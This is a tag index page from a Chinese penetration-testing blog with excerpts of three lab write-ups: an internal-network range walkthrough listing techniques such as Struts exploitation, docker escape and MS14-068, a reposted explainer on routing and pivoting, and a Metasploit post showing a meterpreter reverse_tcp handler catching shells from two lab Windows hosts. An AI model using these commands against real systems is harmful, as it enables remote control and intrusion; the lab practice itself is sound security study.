提权 on Rainwo's Blog

内网渗透靶场实践

Sat, 10 Apr 2021 00:00:00 +0000

内网渗透-2
#

公众号上HACK学习呀上面的一篇内网渗透文章，收益颇多，本篇文章实验部分为自己重现

重现时遇到各式各样的奇葩问题，现均已解决

原文链接：https://mp.weixin.qq.com/s/UIGYJvfNAty7ywg3EBjTJw

靶场地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/6/

本次靶场渗透包括反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。

知识点
#

st漏洞利用
phpmyadmin getshell
tomcat 漏洞利用
docker逃逸
ms14-068
ssh密钥利用
流量转发
历史命令信息泄露
域渗透

环境配置
#

共三台靶机，导入到VMware中

MSF内网渗透

Fri, 06 Nov 2020 00:00:00 +0000

本文转载自https://www.freebuf.com/articles/network/125278.html

本文实操部分均为本人复现

纵深防御也被被称之为“多层防御”，这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险，在其中有些电脑被入侵或是泄密时，风险可以大大降低。举例来说，防毒软件被安装于个人工作站上，电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。

何谓路由
#

确定设备如何在不同网络之间相互传输的过程，也即通过互联的网络把信息从源地址传输到目的地址的活动被称之为路由。通常用于执行路由活动的设备被称为路由器。通过使用路由表，路由器则规划网络包到各自目的地的线路。路由的功能不仅仅是诸如路由器等网络设备能够完成，在安装有该功能的任意计算机系统也能够完成。

根据上图例子所示，为了在192.168.1.0/24与192.168.10.0/24网络之间进行通信是需要一个路由表记录的。根据路由器中的规则定义，数据需要从192.168.1.0/24源网络发到192.168.10.0/24目的网络中去。网络数据包大概会经历如下过程：

要访问的IP地址是否就在本地网络？
- 是否到达目的地
- 否则发送到网关
路由器接收到数据包就会查看其路由表

MSF提权操作

Fri, 30 Oct 2020 00:00:00 +0000

最近有个问题苦恼了我很久，“msf”是否可以控制多台服务器，怎么通过“msf”进行提权操作？

这里我直接开启了两台win7SP1X64的主机，通过运行后门的方式获得shell，这里生成shell的步骤略过。

获得服务器shell
#

首先我们在kali里面开启msf并调用exploit/multi/handler

msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.142.19
lhost => 192.168.142.19
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.142.19:4444 
msf5 exploit(multi/handler) > [*] Sending stage (176195 bytes) to 192.168.142.24
[*] Meterpreter session 1 opened (192.168.142.19:4444 -> 192.168.142.24:52612) at 2020-10-30 10:15:32 +0800

msf5 exploit(multi/handler) > 
[*] Sending stage (176195 bytes) to 192.168.142.101
[*] Meterpreter session 2 opened (192.168.142.19:4444 -> 192.168.142.101:49230) at 2020-10-30 10:15:50 +0800

msf5 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information          Connection
  --  ----  ----                     -----------          ----------
  1         meterpreter x86/windows  WY-PC\WY @ WY-PC     192.168.142.19:4444 -> 192.168.142.24:52612 (192.168.200.128)
  2         meterpreter x86/windows  W-Y-PC\W-Y @ W-Y-PC  192.168.142.19:4444 -> 192.168.142.101:49230 (192.168.142.101)

msf5 exploit(multi/handler) >

这里要特别注意两个位置：

提权 on Rainwo's Blog

内网渗透靶场实践

内网渗透-2 #

知识点 #

环境配置 #